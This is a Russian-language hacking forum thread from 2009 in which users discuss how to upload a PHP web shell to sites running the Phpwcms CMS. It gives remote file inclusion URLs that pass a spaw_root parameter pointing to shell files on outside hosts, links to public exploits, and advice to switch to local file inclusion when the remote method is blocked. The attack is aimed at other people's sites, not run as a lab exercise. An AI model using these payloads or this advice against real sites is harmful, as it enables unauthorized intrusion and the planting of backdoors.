Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Phpwcms (https://forum.antichat.xyz/showthread.php?t=102742)

Велемир

23.01.2009 20:28

Phpwcms

Кто знает,как залить пхпшелл в эту CMSку?))

ElteRUS

23.01.2009 20:33

версия ?

RFI
http://www.site.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.evalsite.com/shell.php?

Велемир

23.01.2009 20:48

Хз как её узнать,но там стоит open_basedir и safe_mod =_=.Как раз этот метод пробывал недавно,и бэйздира меня спалила)( Версия РНР - 4.3.10-22

Can`t include external file пишет =_=.А стоит allow_url_fopen() =_=

Pashkela

23.01.2009 21:11

Так ищи локальный инклуд, удаленный вообще редко где прокатывает

http://milw0rm.com/exploits/2758
http://milw0rm.com/exploits/2163

Велемир

23.01.2009 21:17

Придётся... )

Велемир

23.01.2009 21:26

http://site.com/nclude/inc_ext/spaw/dialogs/img.php

Вывелось Image Properties (http://milw0rm.com/exploits/2163)

К чему это ? spaw_root переменной вообще нету )))

как тут:

PoC:
http://victim-site/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?

Время: 18:44